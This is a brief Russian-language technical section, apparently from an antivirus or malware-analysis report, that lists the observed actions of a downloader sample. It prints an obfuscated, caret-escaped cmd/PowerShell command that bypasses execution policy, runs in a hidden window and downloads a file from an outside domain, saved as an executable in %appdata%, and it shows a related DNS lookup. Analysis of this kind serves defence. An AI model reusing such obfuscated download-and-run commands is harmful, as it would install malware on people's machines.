Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^werSH^E^l^L^.eXe -ExeCuTio^npol^i^cY ^B^yp^A^s^s^ -N^o^Pr^OFil^E^ -^WInDowSTyL^e^ HIDDen (^N^E^w^-^OBJ^EC^t sY^STem^.^NET.^w^EBcL^ien^t^).^do^WnL^oADFILE('http://www.doorasope.top...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "Po^werSH^E^l^L^.eXe -ExeCuTio^npol^i^cY ^B^yp^A^s^s^ -N^o^Pr^OFil^E^ -^WInDowSTyL^e^ HIDDen (^N^E^w^-^OBJ^EC^t sY^STem^.^NET.^w^EBcL^ien^t^).^do^WnL^oADFILE('http://www.doorasope.top...' (со скрытым окном)